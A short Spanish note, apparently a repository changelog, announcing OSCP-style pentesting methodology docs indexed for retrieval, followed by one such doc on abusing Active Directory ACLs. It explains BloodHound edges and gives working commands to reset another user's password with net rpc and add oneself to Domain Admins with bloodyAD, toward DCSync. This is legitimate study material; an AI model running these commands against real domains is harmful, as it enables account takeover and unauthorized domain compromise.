El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
981 B
981 B
ACL abuses
Permisos mal configurados sobre objetos de AD que te dejan escalar. BloodHound te los pinta como aristas. Camino de Active Directory.
Las aristas peligrosas
GenericAll → control total sobre el objeto
WriteDACL → te das a ti mismo cualquier permiso
AddMember → te metes en un grupo (ej. Domain Admins)
ForceChangePassword → cambias la pass de otro usuario sin saber la actual
GenericWrite → modificar atributos (ej. añadir SPN → Kerberoasting dirigido)
Explotación típica (con bloodyAD / PowerView / impacket)
# ForceChangePassword:
net rpc password "victima" "NuevaPass123!" -U "dominio/yo%mipass" -S DC_IP
# AddMember a un grupo:
bloodyAD -d corp.local -u yo -p pass --host DC add groupMember "Domain Admins" yo
Encadenado
Una arista lleva a otra → BloodHound calcula el camino hasta Domain Admins → puede acabar en DCSync.
Relacionado: BloodHound · LAPS · OSCP MOC